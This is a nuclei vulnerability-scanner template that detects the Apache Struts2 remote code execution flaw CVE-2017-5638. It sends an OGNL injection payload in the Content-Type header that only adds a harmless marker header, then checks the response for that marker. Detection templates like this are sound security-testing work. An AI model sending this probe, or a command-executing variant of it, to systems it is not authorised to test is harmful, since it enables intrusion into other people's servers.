nuclei-templates/cves/2017/CVE-2017-5638.yaml

27 lines
1.1 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2017-5638
info:
author: Random_Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce,apache
reference: https://github.com/mazen160/struts-pwn
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
words:
- "X-Hacker: Bounty Plz"
part: header